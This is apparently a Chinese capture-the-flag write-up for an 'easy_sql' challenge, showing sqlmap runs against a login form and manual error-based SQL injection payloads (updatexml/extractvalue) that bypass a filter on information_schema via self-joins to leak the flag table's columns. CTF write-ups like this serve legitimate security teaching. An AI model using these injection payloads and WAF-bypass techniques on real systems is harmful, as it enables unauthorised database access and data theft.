第十四届信息安全竞赛-easy_sql-wp

随便输入一些,发现是post注入,直接bp抓包,将数据包内容全部放到1.txt中,sqlmap跑起来

sqlmap -r 1.txt --batch

发现三种类型的注入,接着我们跑下数据库

sqlmap -r 1.txt --batch --dbs

继续,爆表试试

sqlmap -r 1.txt --batch -D security --tables

发现到这一步,sqlmap就跑不了了,所以后端php脚本肯定是过滤了某些字符串,手动测试下,这里使用报错注入来试一试

uname=admin') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+&passwd=1&Submit=%E7%99%BB%E5%BD%95

可以看到这里明显有一个过滤,waf过滤掉了information_schema库,所以需要information_shema bypass,使用join来绕过 用法join … using(xx)

先查询flag表中的字段,第一个字段id

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag a)c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

第二个字段no

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag using(id))c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

第三个字段

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag using(id,no))c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

显然flag字段存在于第三个字段中

a017ad0b-41f8-42b5-9c13-a2b67dc471d4

接着可以回到sqlmap中继续跑下

sqlmap -r 1.txt --batch -D security -T flag -C a017ad0b-41f8-42b5-9c13-a2b67dc471d4 --dump

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值